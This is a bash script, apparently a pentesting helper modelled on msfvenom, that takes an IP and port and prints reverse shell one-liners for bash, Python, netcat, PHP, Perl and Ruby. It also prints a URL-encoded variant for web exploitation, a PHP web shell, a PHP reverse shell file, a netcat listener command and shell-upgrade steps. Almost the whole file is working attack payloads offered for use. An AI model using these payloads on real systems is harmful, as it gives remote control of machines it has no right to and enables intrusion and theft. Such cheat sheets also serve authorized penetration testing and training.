#!/bin/bash
#
# Reverse Shell Generator
# Similar to: msfvenom (for payload generation)
# Package equivalent: brew install metasploit (but that's huge)
#
# Usage: ./reverse_shell_gen.sh <your_ip> <port>
# Example: ./reverse_shell_gen.sh 192.168.1.100 4444

if [ -z "$1" ] || [ -z "$2" ]; then
    echo "Usage: $0 <your_ip> <port>"
    echo "Example: $0 192.168.1.100 4444"
    echo ""
    echo "Don't forget to start listener: nc -lvnp 4444"
    exit 1
fi

IP="$1"
PORT="$2"

echo "========================================="
echo "     REVERSE SHELL PAYLOADS"
echo "     Target: $IP:$PORT"
echo "========================================="
echo ""
echo "Start your listener first:"
echo -e "\033[32mnc -lvnp $PORT\033[0m"
echo ""
echo "========================================="
echo "BASH:"
echo "========================================="
echo "bash -i >& /dev/tcp/$IP/$PORT 0>&1"
echo ""
echo "# URL encoded for web exploitation:"
echo "bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F$IP%2F$PORT%200%3E%261"
echo ""
echo "========================================="
echo "PYTHON:"
echo "========================================="
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$IP\",$PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
echo ""
echo "# Python3 version:"
echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$IP\",$PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
echo ""
echo "========================================="
echo "NETCAT:"
echo "========================================="
echo "nc -e /bin/bash $IP $PORT"
echo ""
echo "# If -e flag not available:"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f"
echo ""
echo "========================================="
echo "PHP:"
echo "========================================="
echo "php -r '\$sock=fsockopen(\"$IP\",$PORT);exec(\"/bin/bash -i <&3 >&3 2>&3\");'"
echo ""
echo "# PHP web shell one-liner:"
echo "<?php system(\$_GET['cmd']); ?>"
echo ""
echo "# PHP reverse shell (save as shell.php):"
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/$IP/$PORT 0>&1'\"); ?>"
echo ""
echo "========================================="
echo "PERL:"
echo "========================================="
echo "perl -e 'use Socket;\$i=\"$IP\";\$p=$PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};'"
echo ""
echo "========================================="
echo "RUBY:"
echo "========================================="
echo "ruby -rsocket -e'f=TCPSocket.open(\"$IP\",$PORT).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'"
echo ""
echo "========================================="
echo "UPGRADE SHELL (after connection):"
echo "========================================="
echo "# Get better shell:"
echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
echo "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
echo ""
echo "# Fix terminal size:"
echo "stty raw -echo"
echo "export TERM=xterm"
echo ""
echo "========================================="